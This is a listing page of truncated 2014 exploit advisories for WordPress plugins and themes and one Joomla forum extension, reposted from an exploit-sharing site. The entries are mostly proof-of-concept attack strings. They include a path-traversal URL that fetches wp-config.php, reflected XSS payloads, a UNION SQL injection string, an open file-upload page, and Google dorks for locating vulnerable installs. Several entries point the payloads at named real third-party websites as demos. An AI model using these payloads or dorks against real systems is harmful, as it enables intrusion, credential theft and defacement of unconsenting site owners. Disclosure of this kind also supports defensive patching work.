WordPress KenBurner Slider Arbitrary File Download

26 August 2014 - Source: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The WordPress plugin called KenBurner Slider suffers from an arbitrary file download vulnerability.
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 August 2014 - Source: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

WordPress MyBand Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows, Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

WordPress Gamespeed Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

WordPress SI CAPTCHA Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress SI CAPTCHA Anti-Spam Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork: inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

WordPress GB Gallery Slideshow 1.5 SQL Injection

14 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://gb-plugins.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
 
# Date : 2014-08-09
 
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
        Linux / Mozilla Firefox
 
######################
 
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
 
######################
 
# Vulnerable code :
 
    if(isset($_POST['selected_group'])){
        global $gb_post_type, $gb_group_table, $wpdb;
        $my_group_id = $_POST['selected_group'];
    ...

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 August 2014 - Source: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

WordPress WPSS 0.62 Cross Site Scripting

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS v 0.62 Plugin Cross site scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows, Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id="/><script>alert(1);</script>
...

WordPress WPSS 0.62 SQL Injection

7 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: Wordpress WPSS V 0.62 Plugin Sql injection
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-05
  |
  | [*] Vendor Homepage : http://timrohrer.com/blog/?page_id=71
  |
  | [*] Software Link : http://timrohrer.com/blog/files/wpSS_v0.62.zip
  |
  | [*] Version : 0.62
  |
  | [*] Tested on: Windows, Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] PoC :
  |
  | [*] [Localhost]/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
...

Joomla Kunena Forum 3.0.5 Cross Site Scripting

4 August 2014 - Source: http://www.mondounix.com
Kunena forum extension for Joomla multiple reflected cross-site scripting vulnerabilities
 
Class:            Input Validation Error
CVE:              N/A
Remote:           Yes
Local:            No
Published:        02/07/2014

Credit:           Raymond Rizk of Dionach (vulns@dionach.com)
Vendor:           Kunena
Vulnerable:       Kunena v3.0.5
Solution Status:  Fixed by Vendor
 
Kunena Forum is prone to multiple reflected cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.
 
Kunena...
